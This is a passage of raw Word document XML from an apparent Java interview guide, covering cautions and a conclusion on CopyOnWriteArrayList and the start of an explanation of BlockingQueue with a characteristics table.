          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid using CopyOnWriteArrayList if the list is </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequently updated</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C69865"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Avoid Large Lists:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copying large lists on every write can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D10061"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t>Snapshot Iteration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Be aware that </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modifications during iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be reflected</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A087116"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Memory Consideration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Due to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>copy-on-write strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, be mindful of </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when updates are frequent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E74FC2" w14:textId="77777777" w:rsidR="00640264"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pict w14:anchorId="59543C2F">
          <v:rect id="_x0000_i6965" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB7522" w14:textId="77777777" w:rsidR="00640264" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB62D8" w14:textId="1A786F23" w:rsidR="00EE66E8" w:rsidRPr="00640264" w:rsidRDefault="00640264" w:rsidP="00640264">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CopyOnWriteArrayList is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>excellent choice</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for use cases where </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads far exceed writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Its thread-safe nature and fail-safe iterators make it ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent read-heavy scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, due to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high cost of write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it should be avoided in scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BEC15" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="38335491">
          <v:rect id="_x0000_i3931" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CC5E3"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7" w:name="_Toc197867401"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>BlockingQueue?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="2674131D" w14:textId="1A741D05" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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BlockingQueue is an interface in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package that </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>supports operations that wait for the queue to become non-empty when retrieving an element</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for space to become available when storing an element</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E084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6E375A7B">
          <v:rect id="_x0000_i7103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60E70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7906"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="7ACCD5F0" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8C0A2E" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00AB365E">
            <w:pPr>
              <w:jc w:val="center"/>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haracteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6F4C3E" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00AB365E">
            <w:pPr>
              <w:jc w:val="center"/>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0FC9F8E" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F385C3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ackage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50365F8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java.util.concurrent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="17083C8D" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0681E3A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40083C9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 (internally synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="6273DCD9" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3207B7B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locking Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D1F3CF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upports </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>waiting</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for elements to be available or space to be free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="47BB6AFF" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EC655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Implementation Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F8CC1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rrayBlockingQueue, LinkedBlockingQueue, PriorityBlockingQueue, SynchronousQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="17107102" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C04992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Null Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5773F8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Not allowed</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (throws NullPointerException if attempted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CCC29E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5C971100">
          <v:rect id="_x0000_i7104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70440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2. How Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEBAE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 BlockingQueue </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocks the thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2184FB39"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queue is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when trying to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retrieve</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6823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queue is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when trying to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF316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w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer-consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenarios where producers add elements and consumers remove them concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077350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utomatic Synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> No need for explicit locking or synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B1E7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2A7411A1">
          <v:rect id="_x0000_i7105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DC1C2"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3. Methods in BlockingQue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7324"/>
      </w:tblGrid>
